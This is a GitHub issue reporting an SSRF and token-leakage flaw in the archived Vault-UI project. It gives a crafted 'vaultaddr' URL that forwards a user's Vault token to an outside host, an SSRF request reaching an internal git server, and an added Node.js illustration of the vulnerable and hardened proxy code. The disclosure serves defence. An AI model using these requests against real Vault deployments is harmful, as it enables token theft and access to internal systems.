This repository has been archived by the owner on Mar 27, 2019. It is now read-only.

Security issue. Token leakage #255

Open
anton00706 opened this issue Aug 15, 2018 · 5 comments

Comments

@anton00706

Hi.
Our security team tested your UI and found a vulnerability.
Here is a feedback from them:

Steps to reproduce
Token leakage:

  1. Log in to Vault UI with a token
  2. visit http://spb-off-vault01.team.wrike.com:8000/v1/sys/capabilities-self?vaultaddr=http:%2F%2Fifyoucanyoucantest.pythonanywhere.com%2fexamples%2fsimple_examples%2fhello3.html%3f
  3. Open file token.txt at 192.168.3.105

Access token stolen.

Internal resources access:

  1. Disable VPN and send request
    GET /v1/sys/capabilities-self?vaultaddr=https:%2F%2Fgit.wrke.in HTTP/1.1
    Host: spb-off-vault01.team.wrike.com:8000
    ...

You get the git.wrke.in content, but we assume that an attacker should have no access to it.

Actual result
Token stolen, internal resources accessed

Expected result
No SSRF

Area of Responsibility
Other

Recommendation
Do not use user input; take the value of the target host from configuration.

Currently in /src/vaultapi.js:
let vaultAddr = req.query.vaultaddr;

but should be something like this:
let vaultAddr = config['vaultaddr'];
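The following is an added illustration, not Vault-UI's own code, showing the proxy shape the report describes (upstream host taken from `req.query.vaultaddr`) next to the recommended fix (upstream host taken from configuration only), as a Node.js snippet. The function names, the `config` object, the attacker and Vault hostnames, and the sample request with its token value are all assumptions constructed for the example.

```javascript
// Added example, not Vault-UI's code: the proxy pattern the report describes
// (upstream host taken from req.query.vaultaddr) next to the recommended fix
// (upstream host taken from configuration only). Function names, the `config`
// object and the sample request below are assumptions made for illustration.

// Operator-controlled setting: the only Vault this UI should ever talk to.
const config = { vaultaddr: 'https://vault.internal.example:8200' };

// --- Vulnerable shape (what the issue reports) ---
// The upstream origin comes from the query string. A victim who follows a crafted
// link has their X-Vault-Token forwarded to whatever host the link names, and the
// UI host can be used as a proxy to reach internal services it can see.
function buildUpstreamRequestVulnerable(req) {
  const vaultAddr = req.query.vaultaddr; // attacker-controlled
  return {
    url: vaultAddr + req.path,
    headers: { 'X-Vault-Token': req.headers['x-vault-token'] },
  };
}

// --- Hardened shape (the issue's recommendation) ---
// The upstream origin is read from configuration and the query parameter is
// ignored. The proxied path must be a Vault API path, and as a second,
// independent check the final URL is re-parsed and rejected if it is not on the
// configured origin (defense in depth, e.g. against a protocol-relative
// "//evil/..." path should the prefix check ever be relaxed).
function buildUpstreamRequestHardened(req) {
  const base = new URL(config.vaultaddr);
  if (typeof req.path !== 'string' || !req.path.startsWith('/v1/')) {
    throw new Error('refusing to proxy non-API path: ' + req.path);
  }
  const target = new URL(req.path, base);
  if (target.origin !== base.origin) {
    throw new Error('proxied path escaped the configured Vault origin');
  }
  return {
    url: target.toString(),
    headers: { 'X-Vault-Token': req.headers['x-vault-token'] },
  };
}

// Constructed request modelled on step 2 of the report: the victim is already
// logged in (token present) and is sent to the proxy endpoint with `vaultaddr`
// pointing at an attacker host whose URL ends in "?" so the appended API path
// lands harmlessly in the query string.
const maliciousRequest = {
  path: '/v1/sys/capabilities-self',
  query: { vaultaddr: 'http://attacker.example/collect?' },
  headers: { 'x-vault-token': 's.constructedExampleToken' },
};

// Returns the host each version would send the victim's token to.
function compare(req) {
  const leaked = buildUpstreamRequestVulnerable(req);
  const safe = buildUpstreamRequestHardened(req);
  return {
    vulnerableSendsTokenTo: new URL(leaked.url).host,
    hardenedSendsTokenTo: new URL(safe.url).host,
  };
}

console.log(compare(maliciousRequest));
// { vulnerableSendsTokenTo: 'attacker.example', hardenedSendsTokenTo: 'vault.internal.example:8200' }
```

Both findings in the report (token exfiltration and access to internal hosts) come from the same root cause, the caller choosing the upstream origin, so pinning the origin to configuration closes both at once; validating the path prefix is there to stop the proxy from being pointed at non-API endpoints on the Vault host itself.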

@ghost

ghost commented Jan 7, 2019

Soooo, any suggestions for another UI that's not this one, @anton00706?

@JorisInsign

@reverendtimm the official one?
See https://www.hashicorp.com/resources/vault-oss-ui-introduction

@ghost

ghost commented Jan 7, 2019

@JorisInsign noice. Thanks.

@rptxcosmo

  • What is the status of this issue?
  • Repro steps are not very clear.

@Bitblade

Bitblade commented Feb 5, 2019

There has been no response from a developer, nor has there been a commit since this issue was opened.

So at this point, I don't even care if the issue is real. (Though I think it is). Clearly using Vault-UI to access (company) secrets is a no-go.
